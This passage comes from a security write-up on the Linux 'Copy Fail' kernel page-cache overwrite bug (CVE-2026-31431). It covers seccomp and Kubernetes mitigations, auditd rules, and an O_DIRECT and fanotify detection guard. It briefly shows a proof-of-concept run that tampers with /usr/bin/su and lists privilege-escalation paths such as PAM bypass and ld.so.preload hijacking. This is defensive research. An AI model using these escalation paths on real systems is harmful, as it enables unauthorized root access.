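        # Typical causes: AF_ALG unavailable, or blocked by seccomp or an LSM.
        return f"socket blocked ({errno.errorcode.get(e.errno, e.errno)})"
    try:
        # Binding to the "aead" type is the step that needs algif_aead.
        s.bind(("aead", "gcm(aes)"))
    except OSError as e:
        return f"aead bind blocked ({errno.errorcode.get(e.errno, e.errno)})"
    finally:
        s.close()
    return "reachable"
```

Any result other than "reachable" means this process cannot set up the AEAD socket that the exploit chain needs. The make_socket parameter exists only so the logic can be exercised with a fake socket in tests.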

Notes

  • These mitigations may affect applications that reach kernel crypto from user space through AF_ALG, such as OpenSSL's afalg engine. Most applications fall back to user-space crypto automatically, so practical impact is usually small. In-kernel consumers of the crypto API, such as IPsec xfrm, do not go through AF_ALG sockets.
  • KernelCare users can apply the live patch with kcarectl --update without reboot. Verify with kcarectl --patch-info | grep -i "copy.fail\|algif_aead\|CVE-2026-31431".

7.3 Container Mitigation

If the host kernel has been upgraded to a fixed version (Section 7.1) or the vulnerable module has been disabled (Section 7.2), the vulnerability is eliminated at the root. The container-layer controls below are not strictly required in that case. As defense in depth, however, it is still recommended to block AF_ALG socket creation in containers. The interface has very few legitimate container use cases, and blocking it reduces the attack surface for future bugs in the kernel crypto subsystem as well.

Default security mechanisms do not block it

Docker versions before 29.4.2, Kubernetes RuntimeDefault, and the SELinux targeted policy all allow socket(AF_ALG) and splice(). They do not prevent exploitation.

Upgrade the Docker Runtime

Docker 29.4.2 changed the default container policy to block AF_ALG socket creation, and 29.4.3 fixed a regression in that change. For Docker users, upgrading to 29.4.3 or later is the simplest defense and requires no extra configuration:

docker --version
# Docker version 29.4.3 or later means the defense is built in.

# Validate.
docker run --rm python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL - AF_ALG not blocked')
except OSError as e:
    print(f'[+] AF_ALG blocked: {e}')"

Docker 29.4.2 regression

Docker 29.4.2 tried to block AF_ALG by denying socketcall(2) through seccomp, but that broke 32-bit programs and i386 images such as SteamCMD and Wine. Docker 29.4.3, released on 2026-05-06, fixed the regression by moving enforcement to Docker's own AppArmor/SELinux container profile at the LSM layer. This does not break 32-bit programs. Upgrade directly to 29.4.3 or later.

The SELinux rule here is a Docker-provided deny rule for alg_socket in the container profile. It is not the same as the system default SELinux targeted policy, which does not restrict AF_ALG and does not mitigate this issue by itself. On RHEL/CentOS systems, Docker needs "selinux-enabled": true in daemon.json for the SELinux rule to apply. If SELinux is not enabled, Docker falls back to AppArmor rules on distributions such as Ubuntu and Debian.

Kubernetes is not protected by Docker upgrades

Kubernetes RuntimeDefault applies the default seccomp profile of the node's CRI runtime, typically containerd or CRI-O, not Docker's container policy. Upgrading Docker does not change seccomp behavior for Kubernetes containers. Use a custom profile as described below.

Deploying a Custom Seccomp Profile

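For Kubernetes clusters or Docker environments that cannot be upgraded, deploy a custom seccomp profile manually. The profile below only blocks AF_ALG socket creation, that is, socket() calls with family=38; it does not affect normal TCP/UDP networking. AF_ALG has almost no legitimate use inside most containerized applications. Note that a profile supplied this way replaces the runtime's default seccomp profile instead of extending it, and its defaultAction of SCMP_ACT_ALLOW permits every other syscall. For production use, consider adding the socket rule to a copy of the runtime's default profile.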

Custom profile block-af-alg.json:

{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 1,
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}
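
To make the rule's scope concrete, the sketch below is a toy evaluator for profiles of this shape. It is not libseccomp and only models the SCMP_CMP_EQ comparison used here; decide() is a hypothetical helper written for illustration.

```python
import json

# The same profile as above, embedded so the example is self-contained.
PROFILE = json.loads("""
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {"names": ["socket"], "action": "SCMP_ACT_ERRNO", "errnoRet": 1,
     "args": [{"index": 0, "value": 38, "op": "SCMP_CMP_EQ"}]}
  ]
}
""")


def decide(profile: dict, syscall: str, args: tuple) -> str:
    """Return the action the profile would select; only SCMP_CMP_EQ is modelled."""
    for rule in profile.get("syscalls", []):
        if syscall not in rule["names"]:
            continue
        conds = rule.get("args", [])
        if any(c["op"] != "SCMP_CMP_EQ" for c in conds):
            raise NotImplementedError("this sketch only models SCMP_CMP_EQ")
        # Every argument condition of the rule must hold for the rule to apply.
        if all(args[c["index"]] == c["value"] for c in conds):
            return rule["action"]
    return profile["defaultAction"]
```

With this model, decide(PROFILE, "socket", (38, 5, 0)) selects SCMP_ACT_ERRNO, while a TCP socket such as (2, 1, 0) and every other syscall fall through to SCMP_ACT_ALLOW.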

Cross-distribution applicability

Seccomp-BPF filtering has been part of the Linux kernel since 3.5, and the seccomp(2) syscall since 3.17. The profile above applies to any Linux distribution whose kernel is at least 3.17 and whose container runtime supports seccomp. Docker 1.10 and later, containerd, CRI-O, and Podman all support it.

For non-container environments, such as bare metal or VMs, load an equivalent profile with libseccomp at application startup or use systemd's SystemCallFilter= directive.

Manual Docker deployment:

docker run --rm --security-opt seccomp=block-af-alg.json \
  python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL')
except PermissionError as e:
    print(f'[+] AF_ALG blocked: {e}')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('[+] TCP socket OK')
s.close()"
# [+] AF_ALG blocked: [Errno 1] Operation not permitted
# [+] TCP socket OK

Kubernetes deployment:

Pod Security Standards, including Privileged, Baseline, and Restricted, do not restrict AF_ALG. Copy the custom profile into the kubelet seccomp directory on every node:

cp block-af-alg.json /var/lib/kubelet/seccomp/
# k3s path: /var/lib/rancher/k3s/agent/seccomp/

Reference it from the Pod configuration:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: block-af-alg.json

Use an admission controller such as Kyverno or OPA/Gatekeeper to enforce the profile for all Pods and avoid omissions:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-seccomp-block-af-alg
spec:
  validationFailureAction: Enforce
  rules:
  - name: check-seccomp
    match:
      any:
      - resources:
          kinds: ["Pod"]
    validate:
      message: "Pod must use block-af-alg seccomp profile (CVE-2026-31431 mitigation)"
      pattern:
        spec:
          securityContext:
            seccompProfile:
              type: "Localhost"
              localhostProfile: "block-af-alg.json"
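
One caveat: the pattern above inspects only the Pod-level securityContext. In Kubernetes, a seccompProfile set on an individual container takes precedence over the Pod-level one, so a container could still opt out. The sketch below is a hypothetical offline check, not a Kyverno feature. It computes the effective profile per container from a manifest parsed into a dict. Ephemeral containers are ignored for brevity.

```python
REQUIRED = {"type": "Localhost", "localhostProfile": "block-af-alg.json"}


def effective_profiles(pod: dict) -> dict[str, dict]:
    """Map each container name to the seccomp profile that applies to it."""
    spec = pod.get("spec", {})
    pod_level = spec.get("securityContext", {}).get("seccompProfile", {})
    result = {}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        own = c.get("securityContext", {}).get("seccompProfile")
        # A container-level profile overrides the Pod-level one.
        result[c["name"]] = own if own is not None else pod_level
    return result


def noncompliant_containers(pod: dict) -> list[str]:
    """Names of containers whose effective profile is not the required one."""
    return [name for name, prof in effective_profiles(pod).items() if prof != REQUIRED]
```

An empty result means every container in the manifest runs under block-af-alg.json. A container that sets type: Unconfined on its own securityContext is reported even when the Pod-level setting is correct.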

8. Attack Detection

8.1 Syscall-Level Auditing and Its Limits

The most direct detection idea is to monitor key syscalls in the exploit chain. Auditd can record AF_ALG socket creation:

# Persistent audit rules.
cat > /etc/audit/rules.d/copyfail.rules <<'EOF'
-a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg
-a always,exit -F arch=b64 -S splice -k copyfail_splice
EOF
augenrules --load
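
Once the rules are loaded, matching records can be pulled out of the audit log. One detail is easy to miss: auditd prints syscall arguments in hexadecimal, so AF_ALG (38) appears as a0=26. The sketch below parses SYSCALL records tagged with the copyfail_af_alg key. The sample record is synthetic and abbreviated; it only illustrates the field layout and is not output from the experiments.

```python
import re

# key=value pairs; values are either quoted strings or runs of non-space characters.
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Synthetic, abbreviated example record (not captured from a real system).
SAMPLE = ('type=SYSCALL msg=audit(1778223454.123:4321): arch=c000003e syscall=41 '
          'success=yes exit=3 a0=26 a1=5 a2=0 a3=0 pid=4242 uid=1000 '
          'comm="python3" exe="/usr/bin/python3.11" key="copyfail_af_alg"')


def parse_syscall_record(line: str) -> dict:
    """Split one audit record into a field dictionary, stripping quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def af_alg_events(lines):
    """Yield (pid, uid, exe) for records produced by the copyfail_af_alg rule."""
    for line in lines:
        if not line.startswith("type=SYSCALL"):
            continue
        rec = parse_syscall_record(line)
        # a0 is hexadecimal in the log: 0x26 == 38 == AF_ALG.
        if rec.get("key") == "copyfail_af_alg" and int(rec.get("a0", "0"), 16) == 38:
            yield int(rec["pid"]), int(rec["uid"]), rec.get("exe", "?")
```

In practice the input would be the lines of /var/log/audit/audit.log, for example list(af_alg_events(open("/var/log/audit/audit.log"))) when run as root.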

In container environments, legitimate AF_ALG usage is rare, so Falco and other eBPF tools can raise real-time alerts on AF_ALG socket creation inside containers. On bare metal or VMs, however, legitimate users such as the OpenSSL afalg engine and dm-crypt can produce continuous noise. Even matching the combination of AF_ALG and splice cannot reliably distinguish legitimate crypto operations from exploitation, because opening an AF_ALG socket and calling splice are both legitimate uses of kernel interfaces.

The core limitation is that syscall-based detection cannot be zero-false-positive. It can only say that someone used AF_ALG; it cannot prove that someone exploited Copy Fail. It also has a coverage problem. As Chapter 5 showed, page-cache overwrite is a recurring vulnerability pattern. AF_ALG-specific detection will miss Dirty Frag's AF_KEY path, and splice detection cannot distinguish legitimate zero-copy I/O. A blacklist of specific syscalls will always lag behind new variants.

A better approach is to detect the result, not the technique. For page-cache-only overwrite bugs such as Dirty Pipe, Copy Fail, and Dirty Frag, tampered page cache must differ from the original disk content. That difference is detectable.

8.2 General Detection: Comparing Page Cache with O_DIRECT

The O_DIRECT flag makes read() bypass the page cache and read directly from the block device. Comparing an O_DIRECT read with a normal read() of the same range therefore shows whether the cached copy still matches the disk:

Normal read:  file -> [Page Cache] -> user buffer    <- returns tampered data
O_DIRECT:     file -> [Disk]       -> user buffer    <- returns original data

If the two differ, the Page Cache has been modified illegally.

This method has three important advantages:

  1. Generality. It detects all vulnerabilities that only modify page cache, including Copy Fail, Dirty Pipe, Dirty Frag, and future bugs with the same primitive. It is not tied to any specific attack mechanism. Dirty COW is the exception because it writes modified data back to disk through page writeback; O_DIRECT sees the modified data too, so traditional file-integrity checks such as rpm -V, AIDE, or Tripwire are needed.
  2. Determinism. For files that are not open for writing by any process, a mismatch between page cache and disk is absolutely abnormal. The Linux kernel's deny_write_access() mechanism prevents normal simultaneous write-and-execute situations.
  3. Result-based detection. Even if the attacker uses an unknown vulnerability, any page-cache-only tampering produces a detectable mismatch.

I validated O_DIRECT detection on CentOS 8 with XFS for both overlay2 layer files and host SUID files. Using host /usr/bin/su as an example:

# Copy Fail tampers with the ELF header of /usr/bin/su.
python3 poc_marker.py /usr/bin/su
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# O_DIRECT comparison immediately detects the mismatch.
# Page cache [0:16]: deadbeef020101000000000000000000  <- tampered
# O_DIRECT  [0:16]: 7f454c46020101000000000000000000  <- original ELF header from disk
# [ALERT] SUID binary TAMPERED! 4 bytes differ at: [0, 1, 2, 3]

Implementation detail: O_DIRECT requires the buffer address, the file offset, and the read length to be aligned, typically to the logical block size of the underlying device; aligning to 4096 bytes is a safe choice on most systems. In C, use posix_memalign() to allocate an aligned buffer. ext4, XFS, Btrfs, and overlay2 on top of ext4/XFS support O_DIRECT. tmpfs does not, but tmpfs is less likely to be the primary attack target.
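
The comparison can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not the tool used in the experiments: it assumes Linux, a 4096-byte alignment, and a filesystem that accepts O_DIRECT. An anonymous mmap stands in for posix_memalign() because such mappings are page-aligned. The function names are hypothetical.

```python
import mmap
import os

BLOCK = 4096  # alignment assumed here; some devices may need a different value


def read_cached(path: str, length: int = BLOCK) -> bytes:
    """Normal buffered read, served from the page cache when the page is resident."""
    with open(path, "rb") as f:
        return f.read(length)


def read_direct(path: str, length: int = BLOCK) -> bytes:
    """Read the first `length` bytes with O_DIRECT, bypassing the page cache."""
    aligned = -(-length // BLOCK) * BLOCK      # round the request up to whole blocks
    buf = mmap.mmap(-1, aligned)               # anonymous mappings are page-aligned
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        got = os.preadv(fd, [buf], 0)          # may be short at end of file
        return buf[:min(got, length)]
    finally:
        os.close(fd)
        buf.close()


def diff_offsets(cached: bytes, direct: bytes) -> list[int]:
    """Byte offsets at which the two views of the file disagree."""
    n = max(len(cached), len(direct))
    return [i for i in range(n) if cached[i:i + 1] != direct[i:i + 1]]
```

A check for one file is then diff_offsets(read_cached(path, 16), read_direct(path, 16)). For the two 16-byte headers shown in the output above, the result is [0, 1, 2, 3]. A full scanner would loop over the whole file in BLOCK-sized steps and handle the OSError that O_DIRECT raises on filesystems that do not support it.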

8.3 Runtime Interception: fanotify Guard

O_DIRECT comparison answers whether tampering can be detected. The next question is when to check. Periodic full scans are not immediate, but checking every file open is too expensive.

Linux fanotify provides the FAN_OPEN_EXEC_PERM event on kernel 5.0 and later. When execve() is about to execute a file, the kernel sends a permission request to user space. A user-space program can read the file, perform checks, and respond with FAN_ALLOW or FAN_DENY. Combining O_DIRECT comparison with fanotify gives a real-time execution guard.

Design decisions:

  • Monitor only SUID/SGID files. At startup, scan target directories and build a set of SUID/SGID files. Executions of non-SUID files are allowed immediately with no overhead.
  • Skip root executions. Root already has full privilege and does not need SUID escalation. In a container-escape scenario, the tamperer may be root inside the container, but the victim is usually a normal host user executing a tampered SUID file. The Guard still blocks that case.
  • Kernel compatibility. FAN_OPEN_EXEC_PERM requires kernel 5.0 or later. RHEL 8 has a backport and was verified. On older kernels, fall back to FAN_OPEN_PERM, intercept all open events, and filter in user space. This is slightly more expensive but functionally equivalent.
  • No extra write-fd check is needed. If a package manager is updating a SUID file, the kernel itself rejects execve() with ETXTBSY through deny_write_access(). A legitimate update does not create a false positive execution event.
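
The first two design decisions can be sketched without touching fanotify itself. The code below is an illustration under my own naming, not the Guard's source: find_suid_sgid() builds the monitored set at startup, and needs_check() is the cheap filter applied to each exec event before any O_DIRECT comparison is attempted. The check_root parameter mirrors the check_root=False setting visible in the Guard log.

```python
import os
import stat


def find_suid_sgid(root: str) -> set[str]:
    """Return regular files under root that carry the SUID or SGID bit."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue                        # file vanished or is unreadable
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.add(path)
    return found


def needs_check(path: str, uid: int, guarded: set[str], check_root: bool = False) -> bool:
    """Decide whether an exec event should trigger the O_DIRECT comparison."""
    if uid == 0 and not check_root:
        return False                            # skip root executions
    return path in guarded                      # non-SUID files are allowed immediately
```

Keeping the filter to a set lookup is what makes the non-SUID path essentially free: only events for files in the startup set ever reach the disk comparison.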

Experiment result on CentOS 8 with kernel 4.18.0:

2026-05-08 06:57:34 INFO Found 21 SUID/SGID files
2026-05-08 06:57:34 INFO Monitoring mount (FAN_OPEN_EXEC_PERM): /usr
2026-05-08 06:57:34 INFO Guard active [ENFORCE] (event_size=24, check_root=False)

# After Copy Fail tampers with /usr/bin/su, a normal user tries to execute it:
2026-05-08 06:57:38 WARNING [ALERT] BLOCKED pid=2677362 uid=1000 /usr/bin/su
                            (page cache tampered at offset 0)
# User side:
$ /usr/bin/su
bash: /usr/bin/su: Operation not permitted  (exit 126)

The Guard successfully blocks the tampered SUID binary at execve() time and prevents privilege escalation.

Detection Coverage

The fanotify Guard uses FAN_OPEN_EXEC_PERM to intercept execve(). By design, it only covers SUID/SGID binary execution. Compared with the host attack paths in Chapter 5:

Attack path | fanotify Guard | Periodic O_DIRECT scan | Reason
SUID/SGID binary overwrite | Yes | Yes | Real-time block at execve()
/etc/passwd UID tampering | No | Yes | Configuration file read through open() and read()
PAM module authentication bypass | No | Yes | Shared library loaded through dlopen()
Shared-library live patching | No | Yes | Library mapped through mmap(), not execve()
/etc/profile command injection | No | Yes | Login shell reads and sources it
Cron script tampering | No | Yes | Executed by crond, but not a SUID file
ld.so.preload path hijack | No | Yes | Dynamic linker reads it at process startup
Container escape through layer sharing | No | Yes | Scan overlay lower layers periodically

The fanotify Guard addresses the most urgent path: blocking tampered SUID binaries before they can escalate privileges. The other host paths and the container scenarios require periodic O_DIRECT scanning. Recommended scan priority is: PAM modules and shared libraries under /lib64/security/ and /lib64/*.so; critical configuration files such as /etc/passwd, /etc/profile, and /etc/ld.so.preload; cron scripts and container lower layers. For read-only files in lower layers, a page-cache versus disk mismatch is a certain anomaly with no false positives.


9. Conclusion

Copy Fail is a classic cross-subsystem design-assumption conflict. authencesn assumed the output buffer was safe kernel memory. The algif_aead in-place optimization made the output buffer include page-cache pages. splice introduced file data into that path without copying. Each design decision was reasonable in isolation, but together they created a security bug that remained present for nine years.

At the host level, the attack surface extends far beyond the SUID overwrite demonstrated by the public PoC. Counting that SUID overwrite, the experiments confirmed seven independent privilege-escalation paths. The other six are /etc/passwd UID tampering with one four-byte write, PAM authentication bypass that accepts any password for root, shared-library live patching without process restart, /etc/profile command injection, cron script tampering, and ld.so.preload path hijacking. These paths are not specific to Copy Fail; they apply to page-cache overwrite vulnerabilities in general. Shared libraries and PAM modules are especially persistent because mmap references prevent drop_caches from evicting the modified pages.

At the container level, Page Cache is global shared state that crosses isolation boundaries. Cross-container page-cache pollution and read-only volume bypass are real. After deeper validation, however, a generic zero-privilege container escape is architecturally infeasible in a standard Kubernetes environment: containerd and runc do not execute snapshot-layer files in the host context. Additional privileged configuration, such as hostPath or CAP_DAC_READ_SEARCH, is needed to turn page-cache tampering into host escape. Docker's docker export can persist tampered data, and docker diff does not reveal it, which makes the bug valuable in supply-chain scenarios.

From a broader view, Copy Fail is one member of the "splice zero-copy plus kernel in-place writeback" family of page-cache overwrite bugs. Dirty Pipe in 2022, Copy Fail in 2026, and Dirty Frag, which appeared only eight days after the Copy Fail fix, all show the same primitive in different subsystems. Defense should therefore not focus only on AF_ALG; the next variant may come from any zero-copy path that performs in-place writes.

For that reason, detection should move from detecting the technique to detecting the result. O_DIRECT bypasses page cache and reads directly from disk. Comparing it with normal read() detects page-cache tampering for all page-cache-only bugs, including Copy Fail, Dirty Pipe, Dirty Frag, and future variants. Dirty COW remains an exception because it writes changes back to disk and must be detected by traditional file-integrity systems. For SUID/SGID binaries, combining O_DIRECT comparison with fanotify FAN_OPEN_EXEC_PERM allows real-time blocking at execve(). Other targets, such as PAM modules, shared libraries, and configuration files, should be covered by periodic O_DIRECT scans.

Defense and detection recommendations:

  1. Upgrade the kernel. This is the root fix.
  2. Block AF_ALG socket creation in container environments, for example with a custom seccomp profile. Docker 29.4.3 and later block it by default through the AppArmor/SELinux container profile.
  3. Deploy a fanotify plus O_DIRECT Guard to block tampered SUID/SGID binaries at execution time.
  4. Periodically scan critical files with O_DIRECT: PAM modules, shared libraries, /etc/passwd, /etc/profile, /etc/ld.so.preload, and container lower layers.
  5. Use Auditd or Falco as baseline telemetry, recording AF_ALG usage as supporting evidence.

The vulnerability details were initially disclosed by Taeyang Lee. This article builds on that disclosure with independent root-cause analysis and experimental validation.


References

Vulnerability Disclosure and Analysis

  • Taeyang Lee, Copy Fail: One-shot local privilege escalation via the Linux crypto API — xint.io
  • NVD, CVE-2026-31431 — nvd.nist.gov
  • Copy Fail official page — copy.fail
  • Microsoft Defender, CVE-2026-31431 Copy Fail vulnerability enables Linux root privilege escalation — microsoft.com
  • CISA Known Exploited Vulnerabilities Catalog — cisa.gov

Kernel Commits

  • a5079d084f8b — 2011, authencesn module introduction
  • 72548b093ee3 — 2017, vulnerability introduced through algif_aead in-place optimization
  • a664bf3d603d — 2026, vulnerability fixed by reverting the in-place behavior

Container Security Responses

  • Juliet, We tested Copy Fail in Kubernetes: PSS Restricted + RuntimeDefault do not block AF_ALG — juliet.sh
  • Stream Security, CVE-2026-31431: how Copy Fail behaves in Kubernetes — stream.security
  • Percivalll, Copy Fail Kubernetes PoC — GitHub
  • Docker seccomp fix, block AF_ALG in v29.4.2 — moby/moby issue
  • Docker 29.4.3 regression fix using AppArmor/SELinux — release notes
  • Sidero Labs / Talos response — siderolabs.com
  • vArmor Copy Fail mitigation rules, AppArmor/BPF — GitHub
  • iwanhae, copyfail-ebpf-k8s — GitHub

Distribution Security Advisories

  • Ubuntu, Fixes available for CVE-2026-31431 (Copy Fail) — ubuntu.com
  • Red Hat, RHSB-2026-02 Cryptographic Subsystem Privilege Escalation — access.redhat.com
  • Debian Security Tracker, CVE-2026-31431 — security-tracker.debian.org
  • SUSE, SUSE responds to the copy.fail vulnerability — suse.com
  • Alpine Linux Security Tracker — security.alpinelinux.org
  • Oracle Linux CVE Tracker — linux.oracle.com
  • AlmaLinux, CVE-2026-31431 Copy Fail — almalinux.org
  • Arch Linux Security Tracker — security.archlinux.org
  • AWS Security Bulletin, CVE-2026-31431 — aws.amazon.com
  • Bottlerocket issue #4821 — GitHub
  • Fedora Discussion, Is Copy Fail patched in Fedora 43? — discussion.fedoraproject.org
  • CloudLinux / KernelCare, Copy Fail live patches — blog.cloudlinux.com

Security Vendor Analysis

  • Palo Alto Unit 42, Copy Fail: What You Need to Know — unit42.paloaltonetworks.com
  • Wiz.io, CopyFail: Linux privilege escalation vulnerability — wiz.io
  • Sysdig, CVE-2026-31431 Copy Fail: Linux kernel flaw lets local users gain root — sysdig.com
  • Kudelski Security — kudelskisecurity.com
  • SentinelOne Vulnerability Database — sentinelone.com
  • Kodem Security, CVE-2026-31431 Remediation Runbook — kodemsecurity.com

Community Discussion and Reporting

  • Hacker News discussion, including mitigation and WSL2 impact — news.ycombinator.com
  • CyberKendra, A 732-byte Python script can get root — cyberkendra.com
  • CVE-2016-5195 Dirty COW — dirtycow.ninja
  • CVE-2017-1000405 Huge Dirty COW — Bindecy
  • CVE-2022-0847 Dirty Pipe — dirtypipe.cm4all.com
  • CVE-2026-43284 and CVE-2026-43500 Dirty Frag — dirtyfrag.io, GitHub PoC, oss-security